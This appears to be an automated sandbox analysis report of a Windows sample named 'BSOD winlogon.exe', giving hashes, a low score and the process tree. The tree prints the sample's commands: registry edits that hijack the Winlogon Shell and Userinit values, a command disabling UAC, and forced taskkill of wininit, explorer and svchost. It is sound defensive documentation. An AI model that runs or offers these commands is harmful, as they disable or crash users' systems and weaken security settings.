Overview

overview

3

Static

static

3

BSOD winlogon.exe

windows7-x64

3

BSOD winlogon.exe

windows10-1703-x64

1

BSOD winlogon.exe

windows10-2004-x64

BSOD winlogon.exe

windows11-21h2-x64

Analysis

  • max time kernel
    0s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08-07-2024 20:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    BSOD winlogon.exe

  • Size

    645KB

  • MD5

    11f0fe870d61f4d824cd7d6c18f59c80

  • SHA1

    d1a29766d46496e76409cda168781d530d4487dd

  • SHA256

    598df6d472e065b7ac6f8cb3a34cbc4928ecd39d9f8f024139db31f232b7f406

  • SHA512

    f06197f43ffe8e76ffba6f8346285682eb32c7d0b42ea0f64f0786cb2a331275f7213ed7a12ae07c3d0fa765f70d9bb446e6ea3ab1e878127174144a503b189e

  • SSDEEP

    12288:yyveQB/fTHIGaPkKEYzURNAwbAgOT+t1nTVyWL1H/x5E3PGpj:yuDXTIGaPhEYzUzA0bnTXR/A3PGpj

Score
1/10

Malware Config

Signatures

  • Kills process with taskkill 6 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\BSOD winlogon.exe
    "C:\Users\Admin\AppData\Local\Temp\BSOD winlogon.exe"
    1⤵
      PID:4188
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1.bat" "
        2⤵
          PID:4124
          • C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1.bat" /f
            3⤵
              PID:4728
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\1.bat" /f
              3⤵
                PID:4844
              • C:\Windows\system32\reg.exe
                reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
                3⤵
                  PID:3640
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im wininit.exe
                  3⤵
                  • Kills process with taskkill
                  PID:5012
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im explorer.exe
                  3⤵
                  • Kills process with taskkill
                  PID:1828
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im svchost.exe
                  3⤵
                  • Kills process with taskkill
                  PID:1424
              • C:\Users\Admin\AppData\Local\Temp\BSOD.exe
                "C:\Users\Admin\AppData\Local\Temp\BSOD.exe"
                2⤵
                  PID:964
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Windows\1.bat" "
                    3⤵
                      PID:3524
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im wininit.exe
                        4⤵
                        • Kills process with taskkill
                        PID:4400
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im explorer.exe
                        4⤵
                        • Kills process with taskkill
                        PID:3992
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im svchost.exe
                        4⤵
                        • Kills process with taskkill
                        PID:3404

                Network

                MITRE ATT&CK Matrix

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\1.bat
                  Filesize

                  492B

                  MD5

                  b865fb530268690369573d8b1d9a97de

                  SHA1

                  d44a7e22574b7d071ebe83e3e4719f6fdf4bb1fc

                  SHA256

                  427e2ae875e01ffaa9ac3c91013452bbe11f327e3eae63c602b5f7cf80153011

                  SHA512

                  69fd9c8daa84f35db75039d459b7c0fbc24ac48b308596f56725fb51ea52a8dcbef52272a1a002f6b2f72aaba32b0b1e61f694c31afda8c7b5e73f9d84c68d53

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\BSOD.exe
                  Filesize

                  437KB

                  MD5

                  4368b67f7e3f4132e300f1d358562cd7

                  SHA1

                  49b18c268a899c0104f465485a58d1e4a8d7b52b

                  SHA256

                  cc5a52a19562887c54f57fbe6151eac4ac0a2e3e73906d51699739fb1486322a

                  SHA512

                  fc228c7771c362262a5fe5e2d2f447ee6627fde044978681bb5914888e67db916b14b94a19dd6bf5d0b48d5a34f8d3e333d03c2c0fab4d348cbf03c41d24f07d

                  Download Submit

                • C:\Windows\1.bat
                  Filesize

                  129B

                  MD5

                  fb76ea9afdc9e4adfbdaa81cdbfa05d5

                  SHA1

                  36f19b71a641a2a60741ffce686df69c049f5fa3

                  SHA256

                  4e7353f3e98005f812af47c43c6bee9671554e8525bc05d3f3bd3c000ed582d7

                  SHA512

                  a51638724abda98b70f6eef3a1593dece82f0f223b0a72237da05133095fd325436d6ade0aa923d4d315c3a06b4540d2b821857366727b6928f9939e82190303

                  Download Submit